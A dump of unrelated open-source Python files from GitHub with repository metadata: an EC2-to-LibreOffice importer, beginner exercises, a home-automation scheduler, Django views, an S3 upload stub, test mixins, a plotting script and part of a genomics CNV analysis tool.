region_name=BOOTSTRAP_REGION)\n regions_dict = client.describe_regions()['Regions']\n regions = [i['RegionName'] for i in regions_dict]\n print('Found regions: {}'.format(regions))\n return regions\n\n def 
_get_instance_type_counts_for_region(self, resource):\n counts = {}\n for instance in resource.instances.all():\n instance_type = instance.instance_type\n az = instance.placement['AvailabilityZone']\n service = 'unknown'\n if instance.tags is not None:\n for tag_dict in instance.tags:\n if tag_dict['Key'] == 'service':\n service = tag_dict['Value']\n counts[(az, service, instance_type)] = counts.get(\n (az, service, instance_type), 0) + 1\n return counts\n\n def _update_instance_counts_sheet(self, doc, instance_counts):\n sheet = _get_or_create_sheet(doc, self.INSTANCE_COUNTS_SHEET_NAME)\n sheet.clearContents(ALL_CELL_FLAGS)\n\n headers = self.INSTANCE_COUNTS_SHEET_HEADERS\n headers_range = sheet.getCellRangeByPosition(0, 0, len(headers) - 1, 0)\n headers_range.setDataArray((headers,))\n headers_range.CharWeight = BOLD\n\n data_range = sheet.getCellRangeByPosition(\n 0, 1, len(headers) - 1, len(instance_counts))\n for row, ((az, service, instance_type), count) in enumerate(\n instance_counts.items()):\n row_range = data_range.getCellRangeByPosition(\n 0, row, len(headers) - 1, row)\n row_range.setDataArray(((az, service, instance_type, count),))\n\n def _get_reserved_instance_counts_for_region(self, client):\n ris = client.describe_reserved_instances(\n Filters=[{'Name': 'state',\n 'Values': ['payment-pending', 'active']}])\n ri_counts = {}\n for ri in ris['ReservedInstances']:\n az = ri['AvailabilityZone']\n instance_type = ri['InstanceType']\n\n ri_counts[(az, instance_type)] = (\n ri_counts.get((az, instance_type), 0) + ri['InstanceCount'])\n return ri_counts\n\n def _update_reserved_instance_counts_sheet(self, doc, ri_counts):\n sheet = _get_or_create_sheet(\n doc, self.RESERVED_INSTANCE_COUNTS_SHEET_NAME)\n sheet.clearContents(ALL_CELL_FLAGS)\n\n headers = self.RESERVED_INSTANCE_COUNTS_SHEET_HEADERS\n headers_range = sheet.getCellRangeByPosition(0, 0, len(headers) - 1, 0)\n headers_range.setDataArray((headers,))\n headers_range.CharWeight = BOLD\n\n data_range = sheet.getCellRangeByPosition(\n 0, 1, len(headers) - 1, len(ri_counts))\n for row, ((az, instance_type), count) in enumerate(ri_counts.items()):\n row_range = data_range.getCellRangeByPosition(\n 0, row, len(headers) - 1, row)\n row_range.setDataArray(((az, instance_type, count),))\n\n def execute(self, args):\n desktop = self.ctx.ServiceManager.createInstanceWithContext(\n \"com.sun.star.frame.Desktop\", self.ctx)\n\n doc = desktop.getCurrentComponent()\n\n instance_counts = {}\n ri_counts = {}\n for region in self._get_all_regions():\n print('Getting instance data from {}'.format(region))\n resource = boto3.resource('ec2', region_name=region)\n client = boto3.client('ec2', region_name=region)\n instance_counts.update(\n self._get_instance_type_counts_for_region(resource))\n ri_counts.update(\n self._get_reserved_instance_counts_for_region(client))\n\n self._update_instance_counts_sheet(doc, instance_counts)\n self._update_reserved_instance_counts_sheet(doc, ri_counts)\n\n\ng_ImplementationHelper.addImplementation(\n ImportEC2InstanceData,\n 'org.penguintechs.wt.libreoffice.ImportEC2InstanceData',\n ('com.sun.star.task.Job',),)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('command')\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n\n connect_string = 'socket,host=localhost,port=2002;urp'\n\n # Start OpenOffice.org, listen for connections and open testing document\n os.system(\n \"/usr/bin/libreoffice '--accept={};' --calc ./costing_test_doc.ods &\"\n 
.format(connect_string))\n\n    # Get local context info\n    localContext = uno.getComponentContext()\n    resolver = localContext.ServiceManager.createInstanceWithContext(\n        \"com.sun.star.bridge.UnoUrlResolver\", localContext)\n\n    ctx = None\n\n    # Wait until the OO.o starts and connection is established\n    while ctx is None:\n        try:\n            ctx = resolver.resolve(\n                \"uno:{};StarOffice.ComponentContext\".format(connect_string))\n        except Exception:\n            pass\n\n    # Execute our job\n    if args.command == 'import_pricing':\n        blah = ImportEC2Pricing(ctx)\n        blah.execute(())\n    elif args.command == 'import_instance_data':\n        blah2 = ImportEC2InstanceData(ctx)\n        blah2.execute(())\n\nif __name__ == \"__main__\":\n    logging.basicConfig(level=logging.DEBUG)\n    logging.getLogger('boto3').setLevel(logging.INFO)\n    logging.getLogger('botocore').setLevel(logging.INFO)\n    main()\n","repo_name":"wt/libreoffice_python_plugin_example","sub_path":"Addons.py","file_name":"Addons.py","file_ext":"py","file_size_in_byte":12802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73791552374","text":"s = 0\n# c % 3 == 0\ncont = 0\ncontT = 0\nfor c in range(1, 500):\n    if c % 3 == 0 and c % 2 != 0:  # if c is a multiple of 3 and c is odd\n        s += c\n        cont += 1\n    contT += 1\n\nprint(f'Dentre os {contT} numeros,\\n o somatório dos {cont} números ímpares múltiplos de 3 no intervalo entre 1 e 500 é de {s}!')\n","repo_name":"ivanDourado/guanabaraPython","sub_path":"mundo2/exercicios/ex048.py","file_name":"ex048.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"29906933422","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport serial\r\nimport time\r\nimport datetime\r\nimport requests\r\nimport sys\r\nimport msql\r\nimport json\r\nimport ssl\r\nimport urllib3\r\nurllib3.disable_warnings()\r\n#import ptvsd\r\n#ptvsd.enable_attach(secret=\"my_secret\")\r\n\r\nprint(\"####### Planning - Start #######\" + time.strftime('%A %d. %B %Y %H:%M', time.localtime()))\r\n\r\n############## TRY CONNECT SQL ##################\r\ncursor = msql.cursor\r\nDbConnect = msql.DbConnect\r\n\r\ndef SendDataToUsb(moduleName, moduleCom, moduleBaudrate, data):\r\n    # if 'ser' not in locals() or not ser.is_open:\r\n    ser = serial.Serial(port=moduleCom, baudrate=moduleBaudrate)\r\n    ser.write(data.encode())\r\n\r\n\r\ndef UpdateDateRaz(cmd_device_id):\r\n    dateRaz = (datetime.datetime.now()+datetime.timedelta(seconds=1)).strftime('%Y-%m-%d %H:%M:%S')\r\n    try:\r\n        cursor.execute(\" update cmd_device set DateRAZ=%s where ID =%s\", (str(dateRaz), str(cmd_device_id)))\r\n    except:\r\n        print (time.strftime('%A %d. %B %Y %H:%M', time.localtime()) + \" Erreur dans la requete UpdateDateRaz dateRaz= \" + str(dateRaz)+ \" cmd_device_id= \"+str(cmd_device_id))\r\n        pass\r\n\r\ndef Action(New_Status, DeviceID, GUID, CarteID, Nom, Type, Widget_Id, Lieux, Device_Id, sensor_attach_value, ValueAct, EtatAct, ModuleName, ModuleConfiguration):\r\n    try:\r\n        Configuration = json.loads(ModuleConfiguration)\r\n    except:\r\n        Configuration = None\r\n\r\n    if Type == \"Thermostat\":\r\n        if float(sensor_attach_value) < float(New_Status):\r\n            str_action = \"1\"\r\n        else:\r\n            str_action = \"0\"\r\n        val = str(CarteID)+\"/\"+str(GUID)+\"_\"+str(Widget_Id)+\"_\"+str(DeviceID)+\"@\"+str(New_Status)+\":\"+str(str_action)+\"\\n\"\r\n        if (str(ValueAct) != str(New_Status) or str(str_action) != str(EtatAct)):\r\n            SendDataToUsb(ModuleName, Configuration[\"com\"], Configuration[\"baudrate\"], val)\r\n            now = datetime.datetime.now()\r\n            now = now.strftime('%Y-%m-%d %H:%M:%S')\r\n#            cursor.execute(\"INSERT INTO Log (DeviceID, DATE, ACTION, Message) VALUES (%s, %s, %s, %s)\", (Device_Id, now, val, \"Planning: \"+Lieux+\" \"+Nom+\" \" + str(CarteID) + \" \" + str(DeviceID) + \" \" + str(New_Status)))\r\n            UpdateDateRaz(cmd_device_id)\r\n            cursor.execute(\"INSERT INTO Log (DeviceID, DATE, Message) VALUES (%s, %s, %s)\", (Device_Id, now, \"Planning: \"+Lieux+\" \"+Nom+\" \" + val))\r\n    else:\r\n        val = str(CarteID)+\"/\"+str(GUID)+\"_\"+str(Widget_Id)+\"_\"+str(DeviceID)+\"@\"+str(New_Status)+\":\"+str(New_Status)+\"\\n\"\r\n        if (ValueAct != New_Status or New_Status != EtatAct):\r\n            SendDataToUsb(ModuleName, Configuration[\"com\"], Configuration[\"baudrate\"], val)\r\n            now = datetime.datetime.now()\r\n            now = now.strftime('%Y-%m-%d %H:%M:%S')\r\n#            cursor.execute(\"INSERT INTO Log (DeviceID, DATE, ACTION, Message) VALUES (%s, %s, %s, %s)\", (Device_Id, now, val, \"Planning: \"+Lieux+\" \"+Nom+\" \" + str(CarteID) + \" \" + str(DeviceID) + \" \" + str(New_Status)))\r\n            UpdateDateRaz(cmd_device_id)\r\n            cursor.execute(\"INSERT INTO Log (DeviceID, DATE, Message) VALUES (%s, %s, %s)\", (Device_Id, now, \"Planning: \"+Lieux+\" \"+Nom+\" \" + val))\r\n\r\nwhile True:\r\n    try:\r\n        time.sleep(0.1)\r\n\r\n        sql = \"\"\" SELECT Status\r\n                ,cmd_device.id\r\n                ,cmd_device.DeviceID\r\n                ,Device.GUID\r\n                ,Device.CarteID\r\n                ,Device.Nom\r\n                ,cmd_device.Type as TypeAction\r\n                ,widget.Name\r\n                ,widget.Id as widget_Id\r\n                ,Lieux.Nom\r\n                ,Device.ID\r\n                ,IFNULL(sensor_attach.value,'') as sensor_attachValue\r\n                ,'' as Request\r\n                ,cmd_device.RAZ\r\n                ,cmd_device.Value\r\n                ,cmd_device.Etat\r\n                ,Module_Type.ModuleName\r\n                ,Module_Type.ModuleType\r\n                ,Module_Type.ModuleConfiguration\r\n                FROM Planning\r\n                INNER JOIN cmd_device on cmd_device.ID = CmdDevice_Id AND Planning.Status != cmd_device.Etat\r\n                INNER JOIN Device on Device.ID = cmd_device.Device_ID\r\n                INNER JOIN Module_Type ON Device.Module_Id = Module_Type.ID\r\n                INNER JOIN widget on widget.Id = cmd_device.Widget_Id\r\n                INNER JOIN Lieux on Lieux.Id = Device.Lieux_ID\r\n                LEFT JOIN cmd_device as sensor_attach on sensor_attach.ID = cmd_device.sensor_attachID\r\n                WHERE\r\n                (\r\n                    (\r\n                        DAYS like '%\"\"\"+str(time.localtime().tm_wday)+\"\"\"%'\r\n                        OR Planning.date = '\"\"\"+time.strftime(\"%y/%m/%d\")+\"\"\"'\r\n                    )\r\n                    AND HOURS ='\"\"\"+time.strftime('%H:%M', time.localtime())+\"\"\":00'\r\n                    AND ACTIVATE = 1\r\n                )\r\n                UNION\r\n                SELECT Status\r\n                ,cmd_device_id\r\n                ,DeviceID\r\n                ,GUID\r\n                ,CarteID\r\n                ,Nom\r\n                ,TypeAction\r\n                ,WidgetName\r\n                ,widget_Id\r\n                ,LieuxNom\r\n                ,Device_ID\r\n                ,'' as sensor_attachValue\r\n                ,IFNULL(Request,'') as sRequest\r\n                ,RAZ\r\n                ,Value\r\n                ,Etat\r\n                ,ModuleName\r\n                ,ModuleType\r\n                ,ModuleConfiguration\r\n                FROM (\r\n                    SELECT 0 as Status, Device.GUID, cmd_device.id as 
cmd_device_id, cmd_device.DeviceID, Device.CarteID, Device.Nom, cmd_device.Type as TypeAction, widget.Name as WidgetName, widget.Id as widget_Id, Lieux.Nom as LieuxNom, Device.ID as Device_ID,Request, Date, IFNULL(DATE_ADD(Date ,INTERVAL RAZ SECOND),\"1900/01/01 00:00:00\") as DateToRaz, RAZ, DateRAZ, Value, Etat\n ,Module_Type.ModuleName, Module_Type.ModuleType, Module_Type.ModuleConfiguration\n FROM cmd_device\n INNER JOIN Device on Device.ID = cmd_device.Device_ID\n INNER JOIN Module_Type ON Device.Module_Id = Module_Type.ID\n LEFT JOIN widget on widget.Id = cmd_device.widget_Id\n LEFT JOIN Lieux on Lieux.Id = Device.Lieux_ID\n ) as t\n WHERE RAZ IS NOT NULL\n AND now() >= IFNULL(t.DateToRaz,'') \n AND now() > IFNULL(t.DateRAZ,'')\n # AND (t.Status != t.Etat or t.widget_Id = 5)\n AND (t.Status != t.Etat and t.Etat != '' or JSON_EXTRACT(t.Request, '$.url') != '')\n group by Device_ID, sRequest;\"\"\"\n\n cursor.execute(sql)\n for row in cursor.fetchall():\n New_Status = row[0]\n cmd_device_id = row[1]\n DeviceID = row[2]\n GUID = row[3]\n CarteID = row[4]\n Nom = row[5]\n TypeAction = row[6]\n WidgetName = row[7]\n Widget_Id = row[8]\n Lieux = row[9]\n Device_Id = row[10]\n sensor_attach_value = row[11]\n Request = row[12]\n RAZ = row[13]\n Value = row[14]\n Etat = row[15]\n ModuleName = row[16]\n ModuleType = row[17]\n ModuleConfiguration = row[18]\n\n if ModuleType == \"Communication\": \n Configuration = json.loads(ModuleConfiguration)\n Action(New_Status, DeviceID, GUID, CarteID, Nom, WidgetName, Widget_Id, Lieux, Device_Id, sensor_attach_value, Value, Etat, ModuleName, ModuleConfiguration)\n if TypeAction == \"Info\":\n dateRaz = (datetime.datetime.now()+datetime.timedelta(seconds=1)).strftime('%Y-%m-%d %H:%M:%S')\n try:\n cursor.execute(\" update cmd_device set cmd_device.Etat ='0', cmd_device.Value ='0' , DateRAZ=%s where ID =%s\", (dateRaz, str(cmd_device_id)))\n except:\n print (time.strftime('%A %d. %B %Y %H:%M', time.localtime()) + \" Erreur dans la requete UpdateDateRaz1 dateRaz= \" + dateRaz+ \" cmd_device_id= \"+str(cmd_device_id))\n pass\n # Minute = datetime.datetime.now().minute\n # cursor.execute(\"update cmd_device set date = (select DATE_FORMAT(now(), '%Y-%m-%d %H:00:00') - INTERVAL \"+str(Minute % RAZ)+\" SECOND) where ID =\"+str(cmd_device_id))\n elif Request != \"\":\n context = ssl._create_unverified_context()\n Request = json.loads(Request)\n url = \"https://127.0.0.1/ThiDom/Core/\"+Request[\"url_ajax\"]\n data = Request[\"data\"]\n postData = []\n\n if data != \"\":\n tbData = data.split(\"&\")\n for x in tbData:\n postData.append(x.split(\"=\"))\n\n if Device_Id:\n postData.append([\"Device_id\", str(Device_Id)])\n \n if cmd_device_id:\n postData.append([\"cmd_device_id\", str(cmd_device_id)])\n\n try:\n full_url = requests.post(url, data=postData, verify=False)\n UpdateDateRaz(cmd_device_id)\n except requests.exceptions.RequestException as e:\n print (time.strftime('%A %d. 
%B %Y %H:%M', time.localtime()) + \" Error planning Exec url :\" + url + \" error : \" + str(e))\r\n                        pass\r\n                #elif RAZ != \"NULL\" and New_Status == 0:\r\n                # else:\r\n                #     Action(New_Status, DeviceID, CarteID, Nom, WidgetName, Lieux, Device_Id, sensor_attach_value, Value, Etat)\r\n                #     cursor.execute(\" update cmd_device set cmd_device.Etat ='0', cmd_device.Value ='0' where ID =\"+str(cmd_device_id))\r\n        DbConnect.commit()\r\n        time.sleep(0.5)\r\n    except KeyboardInterrupt:\r\n        print(\"Bye\")\r\n        sys.exit()\r\n","repo_name":"tguillaume02/ThiDom","sub_path":"Script_domotique/planning.py","file_name":"planning.py","file_ext":"py","file_size_in_byte":10110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73661571572","text":"'''\nDocument search\n'''\n\nstring = input()\ntarget = input()\nanswer = 0\n\nwhile target in string:\n    string = string[string.find(target)+len(target):]\n    answer += 1\n\nprint(answer)\n\n# document = input()\n# word = input()\n# index = 0\n# result = 0\n# while len(document) - index >= len(word):\n#     if document[index:index + len(word)] == word:\n#         result += 1\n#         index += len(word)\n#     else:\n#         index += 1\n# print(result)\n","repo_name":"cotton-han/Algorithm","sub_path":"유형별/기본탐색/1543.py","file_name":"1543.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"34463874203","text":"from django.shortcuts import render, redirect\n#from django.http import HttpResponse\nfrom .forms import ComboForm\nfrom .models import Combo\n#from giftcombo.comboFindercode import *\n\ndef upload_file(request):\n\tif request.method == 'POST':\n\t\tform = ComboForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect(file_download)\n\telse:\n\t\tform = ComboForm()\n\treturn render(request, 'upload_file.html', {\n\t\t'form': form\n\t\t})\n\ndef file_download(request):\n\tcombos = Combo.objects.all()\n\treturn render(request, 'file_download.html', {\n\t\t'combos' : combos\n\t\t})","repo_name":"khushgrover/gift-combo-finder","sub_path":"giftcombo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"18929277537","text":"import os\n\nimport file_transfer\nimport configs as cfg\n\n\ndef getListOfFiles(dirName):\n    # Walk the directory tree and collect every file path\n    list_of_files = []\n    for root, dirs, files in os.walk(dirName):\n        for name in files:\n            list_of_files.append(os.path.join(root, name))\n    return list_of_files\n\n\nfile_name = 'requirements.txt'\nbucket_name = 'phil-nas-backup-bucket'\nS3_file_name = f'{file_name}-uploaded'\ndirName = 'C:/Users/phil_/Downloads'\n\n# Get the list of all files in directory tree at given path\nlistOfFiles = getListOfFiles(dirName)\nprint(listOfFiles)\n\n\n#not working due to what I modified in \"file_transfer.py\" s3.client vs s3.resource\nfile_transfer.upload_with_default_configuration(file_name,bucket_name,S3_file_name,1)\n\nuploaded = upload_to_aws(file_name, bucket_name, S3_file_name)\n\n","repo_name":"PhilMcDaniel/AWS-S3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"21167483968","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n    path('', views.index, name='index'),\n    path('create_painting/', views.PaintingCreateView.as_view(), name='create_painting'),\n    path('painting/', views.PaintingDetailView.as_view(), name='painting_detail'),\n    path('sonic/', views.sonic, name='sonic'),\n    path('signup/', views.SignUpView.as_view(), name='signup'),\n    path('profile', views.CheckedOutBooksByUserView.as_view(), name='profile')\n]","repo_name":"zvallarino/DjangoModels","sub_path":"paintings/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"17315183475","text":"from decimal import Decimal\ndef add(arg1=None):\n    if arg1 == \"\":\n        return \"0\"\n\n    string_with_commas = arg1.replace('\\n', ',')\n    double_comma = string_with_commas.find(\",,\")\n    list_args = string_with_commas.split(',')\n    if double_comma != -1:\n        return f\"Number expected but '{arg1[double_comma+1]}' found at position {double_comma+1}.\"\n\n    list_dec = [Decimal(u) for u in list_args]\n    return str(sum(list_dec))\n","repo_name":"Spendesk/code-dojos","sub_path":"src/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"32971927493","text":"from .assertions import *\n\n\nclass ModelAPICreateTestMixin:\n    \"\"\"Test mixin for model creating endpoints. \"\"\"\n\n    def create_data(self):\n        \"\"\"must be overridden with the desired data which will be sent\n        in the body of the http request to test creating an entity.\n\n        :return dict.\n        \"\"\"\n        return {}\n\n    def test_create_resource(self):\n        # mock\n        obj_data = self.create_data()\n\n        obj_data.update({\n            f'{key}_id': val.id for key, val\n            in self.requirements.items()\n        })\n\n        # act\n        response = self.client.post(self.base_uri, obj_data, format='json')\n\n        # assert\n        assert_object_created(self.MODEL, response)\n\n        # load created entity\n        entity = self.MODEL.objects.get(pk=response.json()['id'])\n\n        # let the user create its own assertions\n        self.assert_after_create(entity)\n\n    def assert_after_create(self, entity):\n        \"\"\"when overridden allows user to make custom assertions.\n        runs after the entity is persisted in the database.\n        \"\"\"\n        pass\n\n\nclass ModelAPIUpdateTestMixin:\n    \"\"\"Test mixin for model updating endpoints. \"\"\"\n\n    def update_data(self):\n        \"\"\"must be overridden with the desired data which will be sent\n        in the body of the http request to test updating an entity.\n\n        :return dict.\n        \"\"\"\n        return {}\n\n    def test_update_resource(self):\n        # mock\n        resource = self.build()\n        update_data = self.update_data()\n        obj_data = {\n            **update_data,\n            **{f'{k}_id': v.id for k, v in self.requirements.items()}\n        }\n\n        # act\n        response = self.client.put(\n            f'{self.base_uri}{resource.id}/', obj_data, format='json')\n\n        # assert\n        updated_resource = self.MODEL.objects.get(pk=resource.id)\n\n        for key, val in update_data.items():\n            if key not in self.NESTED_MODELS:\n                assert_field_equality(updated_resource, key, val)\n\n\nclass ModelAPIQueryTestMixin:\n    \"\"\"Test mixin for model querying endpoints. \"\"\"\n\n    def test_get_resources(self):\n        # mock\n        resource = self.build()\n\n        # act\n        response = self.client.get(self.base_uri)\n\n        # assert\n        assert_response_contains_object(resource, response)\n\n    def test_get_resource_by_key(self):\n        # mock\n        resource = self.build()\n\n        # act\n        response = self.client.get(f'{self.base_uri}{resource.id}/')\n\n        # assert\n        assert_response_contains_object(resource, response, is_array=False)\n","repo_name":"Forked-ONS/domain_schema","sub_path":"core/utils/testing/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"30656085054","text":"# Exercise 17 of \"Learn Python3 the Hard Way\"\n# More Files\n#\n# use exists() to check if file already there.\n# \"w\" overwrite only; \"a+\" append and read\n# len()  # length of a string\n\nfrom sys import argv\nfrom os.path import exists\n\nscript, from_file, to_file = argv\n\nprint(f\"Copying from {from_file} to {to_file}\")\n\n# we could do these two on one line, how?\nin_file = open(from_file)\nindata = in_file.read()\n# indata = open(from_file).read()\n\nprint(f\"The input file is {len(indata)} bytes long.\")\n\nprint(f\"Does the output file exist? {exists(to_file)}\")\nprint(\"Ready, hit RETURN to continue, CTRL-C to abort.\")\ninput()\n\n# out_file = open(to_file, \"w\")\nout_file = open(to_file, \"a+\")\nout_file.write(indata)\n\nprint(\"Alright, all done.\")\n\nout_file.close()\nin_file.close()\n","repo_name":"TomFoxLee/Python543","sub_path":"LPY3THW/ex17.py","file_name":"ex17.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"6403031523","text":"import json\nimport matplotlib.pyplot as plt\nimport numpy as np\n\na = json.load(open('error_stats_master50.json', 'r'))\n\n# Plot yaw errors\nyaw_values = np.array(a['yaw_value'])\nyaw_errors = np.array(a['yaw_error'])\nyaw_values_bin = yaw_values // 3\n\nplt.scatter(yaw_values, yaw_errors, s = 1)\nplt.show()\n\n# Plot pitch errors\npitch_values = np.array(a['pitch_value'])\npitch_errors = np.array(a['pitch_error'])\npitch_values_bin = pitch_values // 3\n\nplt.scatter(pitch_values, pitch_errors, s = 1)\nplt.show()\n\n# Plot roll errors\nroll_values = np.array(a['roll_value'])\nroll_errors = np.array(a['roll_error'])\nroll_values_bin = roll_values // 3\n\nplt.scatter(roll_values, roll_errors, s = 1)\nplt.show()\n\n# idx_yaw = [i for i in range(len(yaw_values)) if abs(yaw_values[i]) <= 30]\n# print(np.mean(yaw_errors[idx_yaw]))\n#\n# idx_pitch = [i for i in range(len(pitch_values)) if abs(pitch_values[i]) <= 30]\n# print(np.mean(pitch_errors[idx_pitch]))\n#\n# idx_roll = [i for i in range(len(roll_values)) if abs(roll_values[i]) <= 30]\n# print(np.mean(roll_errors[idx_roll]))\n","repo_name":"zivic91/deep-head-pose-v2","sub_path":"analysis/analyze_errors.py","file_name":"analyze_errors.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"12095887169","text":"## this tool is the core function of cnv and snv analysis\r\n## author: taozhou\r\n## email: zhou.tao@genecast.com.cn\r\n\r\nimport matplotlib as mpl\r\nmpl.use('Agg')\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\nimport itertools\r\nimport seaborn as sns\r\nimport matplotlib.pylab as plt\r\nimport matplotlib.colors as mc\r\nfrom genecast_package.svm_analysis import feature_select, evaluate_model\r\nfrom sklearn.decomposition import PCA\r\nfrom collections import OrderedDict\r\nfrom collections import defaultdict\r\nimport datetime\r\nimport pandas as pd\r\nimport os\r\nimport sh\r\n\r\n\r\ndef z_score(data, axis):\r\n    if axis == 1:\r\n        z_scored = data\r\n    else:\r\n        z_scored = data.T\r\n    z_scored = (z_scored - z_scored.mean()) / z_scored.std()\r\n\r\n    if axis == 1:\r\n        return z_scored\r\n    else:\r\n        return z_scored.T\r\n\r\n\r\ndef pheatmap(data, length, col_cluster=True, xticklabels=True, yticklabels=True, save=\"pdf\", color=None, name=None):\r\n    data = z_score(data, axis=0)\r\n    if len(data.columns) > 30:\r\n        xticklabels = False\r\n    if len(data) > 80:\r\n        yticklabels = False\r\n    vmin, vmax = data.unstack().quantile([.01, .99])\r\n    re = sns.clustermap(data, cmap=\"bwr\", row_cluster=True, col_cluster=col_cluster, figsize=(13, 10), \\\r\n                        xticklabels=xticklabels, yticklabels=yticklabels, vmin=vmin, vmax=vmax, col_colors=color)\r\n    re.ax_heatmap.set_xticklabels(re.ax_heatmap.xaxis.get_majorticklabels(), rotation=90)\r\n    re.ax_heatmap.set_yticklabels(re.ax_heatmap.yaxis.get_majorticklabels(), rotation=0)\r\n    if col_cluster == False:\r\n        for group, number in length.items():\r\n            re.ax_col_colors.text((number[0] + number[1])/2 - len(group)/2, 1.1, group, size=30)\r\n        re.savefig(name + \".\" + save)\r\n    else:\r\n        re.savefig(name + \"_col_cluster.\" + save)\r\n    plt.close()\r\n\r\n\r\ndef make_col_color_heatmap(group_dic):\r\n    common_color = [\"blue\", \"red\", \"green\", \"grey\"]\r\n    color = {}; length = {}\r\n    temp = 0\r\n    i = 0\r\n    for name, group in group_dic.items():\r\n        length[name] = [temp, temp + len(group)]\r\n        temp += len(group)\r\n        for sample in group:\r\n            color[sample] = common_color[i]\r\n        i += 1\r\n    color = pd.Series(color)\r\n    color.name = \"group\"\r\n    return color, length\r\n\r\n\r\ndef pca(data, group_dic, n=None):\r\n    pca = PCA(n_components=2)\r\n    group = []\r\n    length = OrderedDict()\r\n    temp = 0\r\n    for name, g in group_dic.items():\r\n        length[name] = [temp, temp + len(g)]\r\n        temp += len(g)\r\n        group += g\r\n    data = data[group]\r\n    newData = pca.fit_transform(data.T)\r\n    colors = [\"blue\", \"red\", \"green\", 'turquoise', \"grey\"]\r\n    i = 0\r\n    for name, number in length.items():\r\n        plt.scatter(newData[number[0]:number[1], 0], newData[number[0]:number[1], 1], label=name, color=colors[i])\r\n        i += 1\r\n    plt.title(\"PCA analysis\")\r\n    pc1 = 100*pca.explained_variance_ratio_[0]\r\n    pc2 = 100*pca.explained_variance_ratio_[1]\r\n    plt.xlabel(\"PC1(%.1f)\" % pc1)\r\n    plt.ylabel(\"PC2(%.1f)\" % pc2)\r\n    plt.legend()\r\n    plt.savefig(\"PCA_%s.png\" % n)\r\n    plt.close()\r\n\r\n\r\ndef plot_box(data, which, outname, palette, regulation, group):\r\n    fig, ax1 = plt.subplots(figsize=(8,12))\r\n    box_data = defaultdict(list)\r\n    if which == \"cnv\":\r\n        how = \"mean\"\r\n        for name, g in group.items():\r\n            box_data[name] = data[g].mean(0)\r\n    else:\r\n        how = \"sum\"\r\n        for name, g in group.items():\r\n            box_data[name] = data[g].sum(0)\r\n    data.to_csv(outname + \"_box_data_%s_%s\" % (regulation, how) + \".txt\", sep=\"\\t\")\r\n    sns.boxplot(data=pd.DataFrame(box_data), ax=ax1, width=0.2, linewidth=.5, palette=palette)\r\n    ax1.set_title(outname)\r\n    ax1.set_ylabel('%s value(%s)' % (which, how))\r\n    fig.autofmt_xdate(ha='center', rotation=0)\r\n    fig.savefig(r'%s_box_data_%s_%s_Boxplot.png' % (outname, regulation, how), dpi=600, size=0.5)\r\n    plt.close()\r\n\r\n\r\ndef databox(raw, which, outname=None, 
group=None):\r\n palette = {}\r\n up = []; down = []\r\n group1_data = raw[list(group.values())[0]]\r\n group2_data = raw[list(group.values())[1]]\r\n color = [\"red\", \"green\", \"blue\"]\r\n for gene in raw.index:\r\n if group1_data.ix[gene].sum() - group2_data.ix[gene].sum() >= 0:\r\n up.append(gene)\r\n else:\r\n down.append(gene)\r\n for i, (name, g) in enumerate(group.items()):\r\n palette[name] = color[i]\r\n plot_box(raw.ix[up], which, outname, palette, \"up\", group)\r\n plot_box(raw.ix[down], which, outname, palette, \"down\", group)\r\n\r\n\r\ndef save_data_pdf(data, name, length, color, group_dic, which):\r\n data.to_csv(\"%s.txt\" % name, sep=\"\\t\")\r\n length = {key.split(\"/\")[-1]: value for key, value in length.items()}\r\n group_dic = {key.split(\"/\")[-1]: value for key, value in group_dic.items()}\r\n pheatmap(data, length, col_cluster=True, color=color, name=name, save=\"png\")\r\n pheatmap(data, length, col_cluster=False, color=color, name=name, save=\"png\")\r\n pca(data, group_dic, n=name)\r\n databox(data, which, outname=name, group=group_dic)\r\n\r\n\r\ndef save_parameters(args=None, which=\"cnv\"):\r\n pass\r\n\r\n\r\ndef make_result_folder(args=None, which=\"cnv\", fun=None):\r\n feature_genes = []; gene_lists = {}; color_length = {}\r\n os.chdir(args.outdir)\r\n i = datetime.datetime.now()\r\n for two_group in itertools.combinations([args.group1, args.group2], 2):\r\n target = two_group[0].split(\"/\")[-1] + \"_VS_\" + two_group[1].split(\"/\")[-1] + \"_%s%s%s_%s%s\" % (i.year, i.month, i.day, i.hour, i.minute)\r\n try:\r\n os.mkdir(target)\r\n except FileExistsError:\r\n sh.rm(\"-rf\",target)\r\n os.mkdir(target)\r\n if which == \"cnv\":\r\n name = \"cnv_median_\" + args.data_type\r\n gene_list, a_group, b_group = fun(args.host_gene, two_group[0], two_group[1], data_type=args.data_type)\r\n else:\r\n if args.cal_type == 